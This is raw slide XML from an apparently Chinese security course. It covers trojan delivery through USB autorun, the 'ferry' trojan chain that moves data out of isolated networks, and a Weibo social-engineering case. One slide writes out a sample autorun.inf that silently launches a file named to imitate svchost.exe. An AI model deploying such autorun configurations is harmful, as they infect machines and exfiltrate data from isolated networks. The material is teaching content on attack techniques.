      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1204913" y="428625"/>
            <a:ext cx="7000875" cy="61055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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用移动存储设备植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404813" y="1409700"/>
            <a:ext cx="8326437" cy="2905125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用移动存储设备传播：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Autoplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(autorun.inf)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机制，当插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盘、移动硬盘或者光盘时，可以自动执行恶意程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89089" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2009775" y="4552950"/>
            <a:ext cx="4524375" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D6D5C5"/>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66700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="581025" algn="l"/>
                <a:tab pos="1162050"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zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>AutoRun</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="581025" algn="l"/>
                <a:tab pos="1162050"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zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>open=scvhost.exe</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="581025" algn="l"/>
                <a:tab pos="1162050"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zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shellexecute</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=scvhost.exe</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="581025" algn="l"/>
                <a:tab pos="1162050"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altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shell\Auto\command=scvhost.exe</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2"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8498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>摆渡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258500" name="Picture 4" descr="6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="2069" t="2571"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="981075"/>
            <a:ext cx="6815138" cy="5456238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258501" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="1196975"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>植入外网主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258502" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="1916113"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>植入移动设备</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258503" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="1671638"/>
            <a:ext cx="0" cy="287337"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258504" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6530975" y="2636838"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>植入内网主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258505" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="2363788"/>
            <a:ext cx="0" cy="287337"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258506" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="3357563"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>敏感信息收集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258507" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="3070225"/>
            <a:ext cx="0" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258508" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="3860800"/>
            <a:ext cx="0" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258509" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="4076700"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>敏感信息转移</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258510" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="4508500"/>
            <a:ext cx="0" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258511" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="4772025"/>
            <a:ext cx="2447925" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>敏感信息泄露</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:split dir="in"/>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49288" y="1287463"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2015.12.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>夜间：安天监控预警体系感知到如下线索：某知名作家在新浪微博发布消息，曝光有人以发送“采访提纲”为借口，利用微博私信功能，发送恶意代码链接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
